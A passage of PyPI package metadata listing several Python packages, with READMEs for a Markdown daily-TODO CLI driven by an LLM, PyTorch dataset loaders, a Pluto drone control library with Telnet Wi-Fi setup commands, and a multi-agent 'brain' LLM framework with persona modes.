] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:27:00.972315 | pulumi_mysql-3.3.0a1771568386.tar.gz | 16,404 | 6a/46/dcabde317cb0f337487e0ba234e9648b5de2d1a2a589212edbd226bd8bd8/pulumi_mysql-3.3.0a1771568386.tar.gz | source | sdist | null | false | 54a210573c6273a392348462770a3a3f | c190ab2c901d5cb1d9a0804d4d1e38249f2fbb13439c61b4b68c7d0fc9f3ea8d | 6a46dcabde317cb0f337487e0ba234e9648b5de2d1a2a589212edbd226bd8bd8 | null | [] | 196 |
2.4 | pylabwons | 1.0.8 | SNOWBALL REVERSES LABWONS | # pylabwons
For now, this project is for testing purposes only.
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.10 | [] | [] | [] | [
"lxml",
"pandas",
"plotly",
"pyarrow",
"pykrx",
"pytz",
"scipy",
"ta"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:25:21.140363 | pylabwons-1.0.8.tar.gz | 20,827 | 20/b3/9c4ce5e998db2cb2087a11271029af1322d3f0e7e8a51a1c895682a8e5c2/pylabwons-1.0.8.tar.gz | source | sdist | null | false | 74b87217ff5ed716a879a1e3e0062764 | c710d85645a7babec7a9004e571f94b7d4e4a4ee388e0280e7812cff375f1a1e | 20b39c4ce5e998db2cb2087a11271029af1322d3f0e7e8a51a1c895682a8e5c2 | null | [
"LICENSE"
] | 217 |
2.4 | daily-todo | 0.3.0 | Daily TODO CLI: Markdown schedules + LLM generation/updates/summaries | # Daily TODO
Daily TODO CLI: manages date-named Markdown files in a directory set by an environment variable, and uses an LLM to generate the day's plan, apply natural-language task updates, and produce daily/weekly summaries.
## Features
1. **Markdown management**: keeps one file per day, named `YYYY-MM-DD.md`, in the folder specified by `DAILY_TODO_DIR`.
2. **Daily plan generation**: uses an LLM to turn yesterday's Markdown into today's task list and writes it to today's file.
3. **View and update**: shows the task list and statuses; updates tasks from natural language (complete, add, drop, reword), with the LLM parsing the intent and writing the result back to the file.
4. **Summaries**: LLM-generated summaries for a single day or for the past week.
## Environment Variables
| Variable | Description |
| ----------------- | ------------------------------------------------------------------- |
| `DAILY_TODO_DIR` | Directory for the daily Markdown files; defaults to `./daily-todo` under the current directory when unset. |
| `OPENAI_API_KEY` | **Required.** Key for the OpenAI API or a compatible one (e.g. DeepSeek). |
| `OPENAI_BASE_URL` | Optional. API base URL, e.g. `https://api.deepseek.com`. |
| `OPENAI_MODEL` | Optional. Model name; defaults to `gpt-4o-mini`. |
## Installation and Usage
```bash
pip install daily-todo
# or
uv tool install daily-todo
```
Write the env config into `.zshrc`, then run `source ~/.zshrc` once:
```sh
cat >> ~/.zshrc << 'EOF'
# daily-todo
alias dcli=daily-todo
export OPENAI_BASE_URL=http://localhost:11434/v1
export OPENAI_API_KEY=ollama
export OPENAI_MODEL=qwen2.5:7b-instruct
export DAILY_TODO_DIR="$HOME/.daily-todos"
EOF
source ~/.zshrc
```
```bash
daily-todo --help
# use alias
dcli --help
```
## Command Examples
```bash
# Generate today's tasks from yesterday's file and write them to today's file (defaults to today)
dcli generate
dcli generate --date 2025-02-21
# View today's task list and statuses
dcli list
dcli list --date 2025-02-20
# Update the day's tasks with natural language
dcli update "complete item 1"
dcli update "add 'write weekly report' and drop item 3" --date 2025-02-20
# Daily summary (specify a date; defaults to today)
dcli summary daily
dcli summary daily --date 2025-02-20
# Weekly summary (past 7 days; ends today by default)
dcli summary weekly
dcli summary weekly --date 2025-02-20
```
## Daily File Format
- Files are named `YYYY-MM-DD.md`.
- Suggested structure:
  - `# <date>` or a short title
  - `## 任务` (Tasks): one task per line, with `- [ ]` / `- [x]` / `- [~]` marking pending / done / dropped.
  - Optional free-text sections such as `## 进展` (Progress) and `## 备注` (Notes), used by the LLM when summarizing and when generating the next day's plan.
Example:
```md
# 2026-02-20
## 任务
- [x] Develop the CLI
- [ ] Publish to PyPI
## 日总结
Completed the development work today.
```
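As an illustration (this parser is not part of daily-todo itself), the three status markers described above can be read with a few lines of Python:

```python
import re

# Status markers used in the daily files, as described above.
STATUS = {" ": "pending", "x": "done", "~": "dropped"}

def parse_tasks(markdown: str) -> list[tuple[str, str]]:
    """Extract (status, text) pairs from task lines like '- [x] Develop the CLI'."""
    tasks = []
    for line in markdown.splitlines():
        m = re.match(r"- \[([ x~])\] (.+)", line.strip())
        if m:
            tasks.append((STATUS[m.group(1)], m.group(2)))
    return tasks

sample = "## 任务\n- [x] Develop the CLI\n- [ ] Publish to PyPI\n- [~] Old idea"
print(parse_tasks(sample))
# → [('done', 'Develop the CLI'), ('pending', 'Publish to PyPI'), ('dropped', 'Old idea')]
```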
## Development
### Local Debugging
```bash
cd daily-todo
uv sync
cp env.example .env
uv run python main.py generate # or list / update / summary, etc.
```
Use `env.example` in the project root as a reference, adjusting paths and API settings for your local setup.
| text/markdown | null | null | null | null | null | null | [] | [] | null | null | >=3.12 | [] | [] | [] | [
"typer>=0.12.0",
"openai>=1.0.0",
"python-dotenv>=1.0.0"
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:24:14.761577 | daily_todo-0.3.0.tar.gz | 8,499 | 2d/55/9fc0c619b091087270210311c41d0ace58cf8ef60c769247dd09c405aeee/daily_todo-0.3.0.tar.gz | source | sdist | null | false | 41f77ca62b52a99c00b4b77cabe6da58 | 1a0754268ab89bbfa66e6c1a82d708dd523bf2cb9e153cb8fd39e676be9ac60e | 2d559fc0c619b091087270210311c41d0ace58cf8ef60c769247dd09c405aeee | null | [] | 221 |
2.4 | any-gold | 0.3.0 | Custom PyTorch Dataset implementations for publicly available datasets across various modalities | # any-gold
Have you ever been in a situation where you wanted to experiment with a new dataset and wasted a few hours
of your time before even having access to the data? We did, and we truly believe that it should not be like that anymore.
Any Gold is thus a comprehensive collection of custom PyTorch Dataset implementations for
publicly available datasets across various modalities.
## Purpose
The goal of this repository is to provide custom PyTorch `Dataset` classes
that are compatible with PyTorch's `DataLoader` to facilitate experimentation
with publicly available datasets. Each dataset implementation includes
automated download functionality to locally cache the data before use. Instead of spending time to access the data,
you can focus on experimenting with it.
## Features
- **PyTorch Integration**: All datasets implement the PyTorch `Dataset` interface
- **Automatic Downloads**: Built-in functionality to download and cache datasets
locally
- **Multimodal Support**: Datasets spanning various data types and domains
- **Consistent API**: Uniform interface across different dataset implementations
- **Minimal Dependencies**: Core dependencies are managed with `uv`
## Available Datasets
### Image Datasets
- `PlantSeg`: Large-scale in-the-wild dataset for plant disease segmentation ([Paper](https://arxiv.org/abs/2409.04038), [Zenodo](https://zenodo.org/records/14935094))
- `MVTecADDataset`: Anomaly detection dataset for industrial inspection ([Paper](https://link.springer.com/content/pdf/10.1007/s11263-020-01400-4.pdf), [Hugging Face](https://huggingface.co/datasets/TheoM55/mvtec_all_objects_split))
- `KPITask1PatchLevel`: A dataset for kidney disease segmentation ([Paper](https://arxiv.org/pdf/2502.07288), [Synapse](https://www.synapse.org/Synapse:syn63688309))
- `DeepGlobeRoadExtraction`: Road extraction from satellite images ([Paper](https://arxiv.org/pdf/1805.06561), [Kaggle](https://www.kaggle.com/datasets/balraj98/deepglobe-road-extraction-dataset))
- `ISIC2018SkinLesionDataset`: A dataset for skin lesion segmentation ([Paper](https://doi.org/10.1038/sdata.2018.161), [Hugging Face](https://huggingface.co/datasets/surajbijjahalli/ISIC2018))
- `PascalVOC2012Segmentation`: A dataset for semantic segmentation ([Website](http://www.pascal-network.org/challenges/VOC/voc2012/workshop/index.html), [Kaggle](https://www.kaggle.com/datasets/gopalbhattrai/pascal-voc-2012-dataset))
## Usage
```python
import any_gold as ag
from torch.utils.data import DataLoader
# Initialize a dataset (downloads data if not already present);
# replace AnyDataset with one of the dataset classes listed above
dataset = ag.AnyDataset()
# Create DataLoader
dataloader = DataLoader(dataset, batch_size=32, shuffle=True)
# Iterate through batches
for batch in dataloader:
# Your training/evaluation code here
pass
```
## Contributing
### Process
Contributions are welcome! To contribute to this project:
1. Fork the repository on GitHub
2. Clone your fork: `git clone https://github.com/yourusername/any-gold.git`
3. Create a new branch for your feature: `git checkout -b feature-name`
4. Install development dependencies (see below)
5. Set up pre-commit hooks: `uv run pre-commit install`
6. Implement a new class that inherits from `AnyDataset`
7. Include download functionality for the dataset
8. Add appropriate documentation and tests (pytest) for your dataset class
9. Ensure code passes all pre-commit checks
10. Submit a pull request to the main repository
We use pre-commit hooks to maintain code quality:
- Ruff for linting and formatting
- MyPy for type checking
### Installation
Dependencies in this repository are managed with [`uv`](https://github.com/astral-sh/uv),
a fast Python package installer and resolver. The dependencies are defined in the
`pyproject.toml` file.
```bash
# Clone the repository
git clone https://github.com/yourusername/any-gold.git
cd any-gold
# Install dependencies with uv
uv sync --all-extras
source .venv/bin/activate
```
### Release Process
To release a new version of the `any-gold` package:
1. Create a new branch for the release: `git checkout -b release-vX.Y.Z`
2. Update the version `vX.Y.Z` in `pyproject.toml`
3. Run `uv sync` to update the lock file
4. Commit the changes with a message like `release vX.Y.Z`
5. Merge the branch into `main`
6. Trigger a new release on GitHub with the tag `vX.Y.Z`
| text/markdown | null | goldener-data <yann.chene.tni@gmail.com> | null | null | null | null | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3.13",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"torch",
"torchvision",
"pathlib",
"pandas",
"numpy",
"datasets",
"kagglehub",
"zenodo-client",
"synapseclient",
"opencv-python",
"pytest; extra == \"dev\"",
"pre-commit; extra == \"dev\"",
"ruff; extra == \"dev\"",
"mypy; extra == \"dev\"",
"pandas-stubs; extra == \"dev\"",
"opencv-stubs; extra == \"dev\"",
"types-tqdm; extra == \"dev\"",
"fiftyone; extra == \"tools\""
] | [] | [] | [] | [
"Homepage, https://github.com/goldener-data/any-gold",
"Repository, https://github.com/goldener-data/any-gold",
"Issues, https://github.com/goldener-data/any-gold/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:24:12.447733 | any_gold-0.3.0.tar.gz | 22,191 | 8f/6d/03b8c8dd18ce134c1a05d83f15288a9a6548954fc79c6fa3eee40918a1e5/any_gold-0.3.0.tar.gz | source | sdist | null | false | 30afbac72f2b011f24af8aa7cab31c59 | 31d121d9b69e30686dddfc1f8f54bfac2c3894ff3bb572b383c7670b488452a3 | 8f6d03b8c8dd18ce134c1a05d83f15288a9a6548954fc79c6fa3eee40918a1e5 | Apache-2.0 | [
"LICENSE"
] | 220 |
2.4 | plutocontrol | 1.0.1 | A library for controlling Pluto drones | # plutocontrol
plutocontrol is a Python library for controlling Pluto drones. This library provides various methods to interact with the drone, including connecting, controlling movements, and accessing sensor data.
## Installation
```bash
pip install plutocontrol
```
## Usage
After installing the package, you can import and use the `Pluto` class in your Python scripts.
### Configuration
By default, the package connects to the drone at IP `192.168.4.1` on port `23`. You can customize these values when creating a Pluto instance:
```python
from plutocontrol import Pluto
# Use default IP (192.168.4.1) and port (23)
pluto = Pluto()
# Use custom IP address when in ST mode
pluto = Pluto(ip='192.168.1.100')
```
### Example Usage
#### Example 1: Basic Usage (Default IP)
```python
from plutocontrol import Pluto
# Create an instance of the Pluto class with default IP (192.168.4.1:23)
pluto = Pluto()
# Connect to the drone
pluto.connect()
# Arm the drone
pluto.arm()
# Disarm the drone
pluto.disarm()
# Disconnect from the drone
pluto.disconnect()
```
#### Example 2: Custom IP Address when drone is connected to router with ST mode
```python
from plutocontrol import Pluto
import time
# Create an instance with custom IP
pluto = Pluto(ip='192.168.1.100')
# Connect to the drone
pluto.connect()
time.sleep(1)
# Arm and take off
pluto.arm()
time.sleep(2)
pluto.take_off()
time.sleep(5)
# Fly forward
pluto.forward()
time.sleep(2)
pluto.reset()
# Land and disconnect
pluto.land()
time.sleep(3)
pluto.disconnect()
```
## Class and Methods
### Pluto Class
#### `Connection`
Commands to connect to and disconnect from the drone server.
```python
#Connects to the drone server.
pluto.connect()
#Disconnects from the drone server.
pluto.disconnect()
```
#### `Camera module`
Sets the IP and port for the camera connection. Must be called before `pluto.connect()`.
```python
pluto.cam()
```
#### `Arm and Disarm Commands`
```python
#Arms the drone, setting it to a ready state.
pluto.arm()
#Disarms the drone, stopping all motors.
pluto.disarm()
```
#### `Pitch Commands`
```python
#Sets the drone to move forward.
pluto.forward()
#Sets the drone to move backward.
pluto.backward()
```
#### `Roll Commands`
```python
#Sets the drone to move left (roll).
pluto.left()
#Sets the drone to move right (roll).
pluto.right()
```
#### `Yaw Commands`
```python
#Sets the drone to yaw right.
pluto.right_yaw()
#Sets the drone to yaw left.
pluto.left_yaw()
```
#### `Throttle Commands`
Increase or decrease the drone's height.
```Python
#Increases the drone's height.
pluto.increase_height()
#Decreases the drone's height.
pluto.decrease_height()
```
#### `Takeoff and Land`
```Python
#Arms the drone and prepares it for takeoff.
pluto.take_off()
#Commands the drone to land.
pluto.land()
```
#### `Developer Mode`
Toggle Developer Mode
```Python
#Turns the Developer mode ON
pluto.devOn()
#Turns the Developer mode OFF
pluto.devOff()
```
#### `motor_speed(motor_index, speed)`
Sets the speed of a specific motor (motor index from 0 to 3).
```Python
pluto.motor_speed(0, 1500)
```
#### `Get MSP_ALTITUDE Values`
```python
#Returns the height of the drone from the sensors.
height = pluto.get_height()
#Returns the rate of change of altitude from the sensors.
vario = pluto.get_vario()
```
#### `Get MSP_ATTITUDE Values`
```python
#Returns the roll value from the drone.
roll = pluto.get_roll()
#Returns the pitch value from the drone.
pitch = pluto.get_pitch()
#Returns the yaw value from the drone.
yaw = pluto.get_yaw()
```
#### `Get MSP_RAW_IMU Values`
##### `Accelerometer`
Returns the accelerometer values for the x, y, and z axes.
```python
#Returns the accelerometer value for the x-axis.
acc_x = pluto.get_acc_x()
#Returns the accelerometer value for the y-axis.
acc_y = pluto.get_acc_y()
#Returns the accelerometer value for the z-axis.
acc_z = pluto.get_acc_z()
```
##### `Gyroscope`
Returns the gyroscope values for the x, y, and z axes.
```python
#Returns the Gyroscope value for the x-axis.
gyro_x = pluto.get_gyro_x()
#Returns the Gyroscope value for the y-axis.
gyro_y = pluto.get_gyro_y()
#Returns the Gyroscope value for the z-axis.
gyro_z = pluto.get_gyro_z()
```
##### `Magnetometer`
Returns the magnetometer values for the x, y, and z axes.
```python
#Returns the Magnetometer value for the x-axis.
mag_x = pluto.get_mag_x()
#Returns the Magnetometer value for the y-axis.
mag_y = pluto.get_mag_y()
#Returns the Magnetometer value for the z-axis.
mag_z = pluto.get_mag_z()
```
#### `Calibration Commands`
```python
#Calibrates the accelerometer.
pluto.calibrate_acceleration()
#Calibrates the magnetometer.
pluto.calibrate_magnetometer()
```
#### `Get MSP_Analog Values`
```python
#Returns the battery value in volts from the drone.
battery = pluto.get_battery()
#Returns the battery percentage from the drone.
battery_percentage = pluto.get_battery_percentage()
```
## Enhanced Battery Telemetry (Mobile App Features)
The package now supports enhanced battery telemetry matching the mobile app functionality, with support for multiple MSP protocol versions.
### Protocol Version Detection
The drone's MSP protocol version is automatically detected:
```python
# Check protocol version
print(f"Protocol Version: {pluto.MSP_Protocol_Version}")
```
### Comprehensive Battery Information
Get all battery information in one call:
```python
#Get comprehensive battery info (all parameters)
battery_info = pluto.get_battery_info()
# Protocol V1 returns:
# {
# 'voltage': '11.25V',
# 'current': '1250mA',
# 'capacity_drawn': '450mAh',
# 'capacity_remaining': '1350mAh',
# 'state_of_charge': '75%',
# 'auto_land_mode': 0,
# 'protocol': 'V1 (Enhanced)'
# }
```
### Battery Helper Methods
Convenient methods to check battery status without parsing raw values.
```python
# Get status string ('FULL', 'TWO_BAR', 'ONE_BAR', 'EMPTY')
status = pluto.get_battery_level_status()
# Check for critical battery (< 20%)
if pluto.is_battery_critical():
print("LAND NOW!")
# Check if auto-landing is triggered
if pluto.should_auto_land():
print("Drone is auto-landing due to low battery")
# Get a full summary dict (for UI/Display)
summary = pluto.get_battery_status_summary()
print(f"Icon: {summary['icon']} | Voltage: {summary['voltage']}")
```
### Individual Telemetry Parameters
#### Enhanced Telemetry on Primus X2 / V5 boards
```python
#Get compensated battery voltage in volts
voltage = pluto.get_battery_voltage_compensated()
#Get current draw in milliamps
current = pluto.get_current_mA()
#Get capacity consumed in mAh
capacity_drawn = pluto.get_capacity_drawn_mAh()
#Get remaining capacity in mAh
capacity_remaining = pluto.get_capacity_remaining_mAh()
#Get state of charge (0-100%)
soc = pluto.get_state_of_charge()
#Get auto-land mode status
auto_land = pluto.get_auto_land_status()
```
#### Basic Telemetry on Pluto / V4 boards
```python
#Get battery voltage
voltage = pluto.get_battery_voltage_compensated()
#Get current draw
current = pluto.get_current_mA()
#Get signal strength (RSSI)
rssi = pluto.get_rssi()
#Get power meter sum
power_sum = pluto.get_power_meter_sum()
```
### Telemetry Data Structure
**Protocol Version 1:**
- `vBatComp`: Compensated battery voltage (in centivolts; divide by 100 for volts)
- `mAmpRaw`: Current draw in milliamps
- `mAhDrawn`: Capacity consumed in milliamp-hours
- `mAhRemain`: Remaining capacity in milliamp-hours
- `soc_Fused`: State of charge percentage (0-100)
- `auto_LandMode`: Auto-land mode status (0=off, 1=on)
**Other Versions:**
- `bytevbat`: Battery voltage in decivolts (divide by 10 for volts)
- `pMeterSum`: Power meter sum
- `rssi`: Signal strength indicator
- `amperage`: Current draw in milliamps
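As a sketch, the unit conversions described above can be applied like this (these helpers are illustrations only, not part of the plutocontrol API):

```python
# Hypothetical helpers for the raw telemetry units listed above.

def vbat_comp_to_volts(v_bat_comp: int) -> float:
    # Protocol V1: vBatComp is reported in centivolts
    return v_bat_comp / 100.0

def bytevbat_to_volts(bytevbat: int) -> float:
    # Other protocol versions: bytevbat is reported in decivolts
    return bytevbat / 10.0

print(vbat_comp_to_volts(1125))  # 11.25 (volts)
print(bytevbat_to_volts(112))    # 11.2 (volts)
```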
## Wifi Configuration (Telnet / AT Commands)
To control multiple drones in the same network or to change the drone's Wifi settings (Station Mode - ST), you can configure the Pluto drone using Telnet commands.
### Prerequisites
- A Telnet client (e.g., [Putty](https://www.putty.org/) for Windows, or terminal `telnet` for Mac/Linux).
- Connect your computer to Pluto's Wifi (Default SSID: `Pluto_XXXX`, Password: `dronaaviation`).
### Accessing Configuration
1. Connect to Pluto's Wifi.
2. Open your Telnet client.
3. Connect to **IP: 192.168.4.1** on **Port: 23**.
### Testing Connection
Type the following command:
```text
+++AT
```
Response should be `OK`.
### Common AT Commands
| Command | Description |
|---------|-------------|
| `+++AT` | Test connection. Response: `OK` |
| `+++AT RESET` | Soft reset the ESP (Wifi Module) |
| `+++AT MODE` | Print current mode settings |
| `+++AT MODE <mode>` | Set Wifi mode: <br> `1` : **STA** (Station Mode - Connect to Router) <br> `2` : **AP** (Access Point - Default) <br> `3` : **Both** |
| `+++AT STA` | Print current Station SSID and Password |
| `+++AT STA <SSID> <password>` | Set the Router SSID and Password for Station Mode |
### Example: Setting up Station Mode (Connecting Pluto to Router)
To connect your Pluto drone to your home router so you can control it alongside other devices:
1. Connect to Pluto via Telnet.
2. Set the Router credentials:
```text
+++AT STA MyRouterName MyRouterPassword
```
3. Change mode to Station (or Both):
```text
+++AT MODE 3
```
4. Reset the drone/modules for changes to take effect.
## Debugging and Developer Mode
If you are developing custom features or want to see what's happening inside the drone, you can enable **Serial Debug Mode**. This prints debug messages from the drone directly to your terminal.
```python
# Enable Developer Mode (Serial Debug Output)
pluto.devOn()
# ... perform actions ...
# Disable Developer Mode
pluto.devOff()
```
**Note:** The library automatically detects and prints both:
- **MSP Debug Packets**: Structural debug data sent by the flight controller.
- **Raw Serial Strings**: `printf` style logs used in custom firmware.
## Beginner Project Ideas
Here are some simple projects to get started with `plutocontrol`.
### Project 1: The "Hello World" Flight
A simple script to take off, hover for 3 seconds, and land.
```python
from plutocontrol import Pluto
import time
my_pluto = Pluto()
my_pluto.connect()
print("Arming...")
my_pluto.arm()
time.sleep(2)
print("Taking Off!")
my_pluto.take_off()
time.sleep(3) # Hover for 3 seconds
print("Landing...")
my_pluto.land()
time.sleep(2)
my_pluto.disarm()
my_pluto.disconnect()
```
### Project 2: Keyboard Controller
Control your drone using your computer keyboard!
```python
from plutocontrol import Pluto
import keyboard # pip install keyboard
pluto = Pluto()
pluto.connect()
pluto.arm()
def control_loop():
while True:
if keyboard.is_pressed('w'): pluto.forward()
elif keyboard.is_pressed('s'): pluto.backward()
elif keyboard.is_pressed('a'): pluto.left()
elif keyboard.is_pressed('d'): pluto.right()
elif keyboard.is_pressed('space'): pluto.take_off()
elif keyboard.is_pressed('x'): pluto.land()
elif keyboard.is_pressed('q'): break # Quit
else:
# Reset RC to neutral if keys released
pluto.rcPitch = 1500
pluto.rcRoll = 1500
control_loop()
pluto.disarm()
pluto.disconnect()
```
| text/markdown | Omkar Dandekar | Omkar Dandekar <omi007dandekar@gmail.com> | null | null | null | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | https://github.com/DronaAviation/plutocontrol.git | null | >=3.7 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/DronaAviation/plutocontrol.git"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T06:24:11.551829 | plutocontrol-1.0.1.tar.gz | 17,598 | 89/12/c8d0a582a89e510c348c86308f7f771b63982656986ec3a91a64babd2eb8/plutocontrol-1.0.1.tar.gz | source | sdist | null | false | a6c74b92137a4fc07b59ed68e7c8bc50 | 9f56bdda4d85181501efea9ea9171fdadf91b9c9781756100f384aa58c3f35d5 | 8912c8d0a582a89e510c348c86308f7f771b63982656986ec3a91a64babd2eb8 | null | [
"LICENSE"
] | 213 |
2.4 | brain-system | 0.4.0 | A multi-agent cognitive architecture powered by LangGraph — five specialized AI agents modeled after the human brain. | <div align="center">
# 🧠 Brain System
### A Multi-Agent Cognitive Architecture Powered by LangGraph
*Five specialized AI agents — modeled after the human brain — collaborate to process your input and generate thoughtful, nuanced responses.*
[](https://www.python.org/downloads/)
[](https://pypi.org/project/brain-system/)
[](https://github.com/langchain-ai/langgraph)
[](LICENSE)
</div>
---
## 🧩 How It Works
Brain System maps biological brain functions to specialized AI agents that process every input in parallel — just like the human brain:
```mermaid
graph LR
A[User Input] --> B[🔵 Sensory Agent<br>Thalamus]
B --> C[🟣 Memory Agent<br>Hippocampus]
B --> D[🟢 Logic Agent<br>Frontal Lobe]
B --> E[🔴 Emotional Agent<br>Amygdala]
C --> F[🟡 Executive Agent<br>Prefrontal Cortex]
D --> F
E --> F
F --> G[Final Response]
```
| Agent | Brain Analog | What It Does |
|:------|:-------------|:-------------|
| **Sensory** | Thalamus & Sensory Cortex | Multi-layer signal classification, pattern recognition, salience detection |
| **Memory** | Hippocampus | Persona biography retrieval via ZVec semantic search |
| **Logic** | Left Frontal Lobe & DLPFC | Deductive/inductive reasoning, fallacy detection, counter-arguments |
| **Emotional** | Amygdala, Insula & Cingulate | Emotional profiling, empathy reading, ethical safety checks |
| **Executive** | Full Prefrontal Cortex | Conflict resolution between agents, response calibration, integrated output |
## 🎭 Persona Mode
The Brain can embody famous personalities — or anyone you provide a biography for.
### Pre-curated Personas
8 personalities sourced from their autobiographies are available out of the box — **instant loading, no LLM call required:**
| Persona | ID | Source |
|:--|:--|:--|
| 🕊️ Mahatma Gandhi | `gandhi` | *The Story of My Experiments with Truth* |
| 🔬 Albert Einstein | `einstein` | *The World As I See It* |
| ✊ Nelson Mandela | `mandela` | *Long Walk to Freedom* |
| ⚗️ Marie Curie | `curie` | *Madame Curie* by Ève Curie |
| 🎨 Leonardo da Vinci | `davinci` | Personal Notebooks |
| ✝️ Martin Luther King Jr. | `mlk` | *Stride Toward Freedom* |
| ⚡ Nikola Tesla | `tesla` | *My Inventions* |
| 💻 Ada Lovelace | `lovelace` | Notes on the Analytical Engine |
### Custom Personas
Upload any biography or autobiography (`.txt` / `.pdf`), and the system extracts personality traits, speech patterns, reasoning style, and emotional tendencies — then injects tailored context into each agent. The Logic Agent thinks in their reasoning style, the Emotional Agent mirrors their emotional tendencies, and the Executive Agent speaks in their voice.
> **Example:** Select Nelson Mandela → ask about dealing with conflict → get a response reflecting his values of reconciliation, strategic patience, and ubuntu philosophy.
## 📦 Install
```bash
pip install brain-system
```
> For the web UI, install the optional extra: `pip install brain-system[web]`
## 🚀 Quick Start — Library Usage
```python
from brain_system import BrainWrapper
# Create a Brain (choose provider: "gemini", "openai", or "ollama")
brain = BrainWrapper(provider="ollama", model_name="mistral")
# Process input through all 5 agents
result = brain.think("What is the meaning of justice?")
# Get the final synthesized response
print(result.response)
# Inspect individual agent signals
print(result.sensory) # Thalamus — input classification
print(result.memory) # Hippocampus — memory context
print(result.logic) # Frontal Lobe — logical analysis
print(result.emotional) # Amygdala — emotional analysis
```
### Persona Mode
Use a pre-curated persona or upload a biography/autobiography (`.txt` or `.pdf`):
```python
# Discover available personas
for p in brain.list_personas():
print(f"{p['emoji']} {p['name']} → ID: {p['id']}")
# Pre-curated persona — loads instantly, no LLM call
brain.load_persona("gandhi") # by ID
brain.load_persona("einstein")
# Custom persona — pass a file path
brain.load_persona("gandhi_autobiography.pdf")
result = brain.think("How should we deal with injustice?")
print(result.response) # Responds in persona's voice
brain.clear_persona() # Revert to default
```
### Memory Management
```python
# Custom memory file location
brain = BrainWrapper(provider="gemini", memory_path="./my_memory.json")
# Clear all stored memories
brain.clear_memory()
```
### 🔌 Wrap Your Own Agent
Already have an agent? Wrap it with Brain's cognitive pipeline using `AgentWrapper`. Your function receives a `BrainContext` with all four preprocessing agent signals:
```python
from brain_system import AgentWrapper, BrainContext
def my_agent(query: str, ctx: BrainContext) -> str:
"""Your agent logic — use brain signals however you want."""
return f"Logic: {ctx.logic[:200]}\nEmotion: {ctx.emotional[:200]}"
agent = AgentWrapper(my_agent, provider="openai")
result = agent.run("Should AI be regulated?")
print(result.response) # Your agent's response
print(result.sensory) # Brain's sensory signal (also available)
```
Also works as a **decorator**:
```python
@AgentWrapper(provider="ollama", model_name="mistral")
def my_agent(query: str, ctx: BrainContext) -> str:
return f"Based on logic: {ctx.logic[:200]}"
result = my_agent("What is justice?")
```
### API Reference
| Class / Method | Description |
|:---|:---|
| `BrainWrapper(provider, model_name, memory_path)` | Create a standalone Brain instance |
| `.think(input) → BrainResult` | Process input through the 5-agent pipeline |
| `.load_persona(id_or_path)` | Load a pre-curated persona by ID or a custom `.txt`/`.pdf` |
| `.list_personas()` | Returns list of available pre-curated persona dicts |
| `.clear_persona()` | Remove the active persona |
| `.clear_memory()` | Erase all long-term memories |
| `.persona_active` | `bool` — is a persona loaded? |
| `.persona_name` | Name of the active persona |
| `AgentWrapper(agent_fn, provider, ...)` | Wrap your agent with brain processing |
| `.run(input) → BrainResult` | Run brain + your agent |
| `BrainContext` | Dataclass with `.query`, `.sensory`, `.memory`, `.logic`, `.emotional` |
| `BrainResult.response` | Final synthesized response |
| `BrainResult.agent_signals` | `dict` of each agent's raw output |
| `BrainResult.sensory / .memory / .logic / .emotional` | Shortcut accessors |
See [`examples/`](examples/) for complete usage scripts.
---
## 🖥️ Development Setup
### Clone & Install
```bash
git clone https://github.com/shivamtyagi18/BRAIN.git
cd BRAIN
pip install -e ".[web,dev]"
```
### Configure (Optional)
Create a `.env` file in the project root for cloud providers:
```env
# Only needed if using Gemini or OpenAI
GOOGLE_API_KEY=your_key_here
OPENAI_API_KEY=your_key_here
```
> **No API key needed for Ollama** — runs entirely on your local machine.
### Run
#### Web UI
```bash
python -m brain_system.app
```
Open **http://localhost:5001** in your browser.
#### Command Line
```bash
brain-cli
```
## 🖥️ Web Interface
The web UI features:
- **Provider selection** — choose Gemini, OpenAI, or Ollama at startup
- **Pre-curated personas** — pick from 8 famous personalities in a card grid
- **Custom persona upload** — drag & drop a `.txt` or `.pdf` biography
- **Live chat** — dark-mode interface with agent activity indicators
- **Agent transparency** — expand each agent's internal reasoning with "Show agent signals"
- **Mid-conversation persona switching** — change or clear persona without restarting
- **New Chat** — full reset button to start fresh
- **Clear Memory** — wipe stored memories without restarting
## 🤖 Supported LLM Providers
| Provider | Requirements | Best For |
|:---------|:-------------|:---------|
| **Ollama** | [Ollama](https://ollama.ai) installed locally | Privacy, offline use, no cost |
| **Gemini** | `GOOGLE_API_KEY` in `.env` | High-quality responses |
| **OpenAI** | `OPENAI_API_KEY` in `.env` | GPT-4 class models |
### Using Ollama (Local)
```bash
# Install Ollama, then pull a model:
ollama pull mistral
# For uncensored output, try:
ollama pull dolphin-mistral
```
## 📁 Project Structure
```
brain-system/
├── pyproject.toml # Package config & dependencies
├── run.sh # Single-command launcher
├── examples/
│ ├── basic_usage.py # Minimal library usage
│ ├── persona_mode.py # Persona loading example
│ └── custom_provider.py # Provider switching example
└── brain_system/
├── __init__.py # Public API exports
├── wrapper.py # BrainWrapper — developer entry point
├── app.py # Flask web server (optional)
├── main.py # CLI entry point
├── agents/
│ ├── base_agent.py # Abstract base with persona injection
│ ├── sensory_agent.py # Input parsing (Thalamus)
│ ├── memory_agent.py # Context retrieval (Hippocampus)
│ ├── emotional_agent.py # Sentiment analysis (Amygdala)
│ ├── logic_agent.py # Reasoning (Frontal Lobe)
│ └── executive_agent.py # Decision synthesis (PFC)
├── core/
│ ├── orchestrator.py # LangGraph workflow engine
│ ├── llm_interface.py # Multi-provider LLM factory
│ ├── vector_memory.py # ZVec persona biography search
│ ├── working_memory.py # Conversation context buffer
│ ├── memory_store.py # Legacy memory (JSON)
│ ├── document_loader.py # TXT/PDF document ingestion
│ └── persona.py # Persona extraction & injection
├── personas/
│ ├── __init__.py # Package exports
│ └── persona_registry.py # 8 pre-curated famous persona profiles
└── web/
├── templates/index.html # Chat interface
└── static/
├── css/style.css # Dark-mode theme
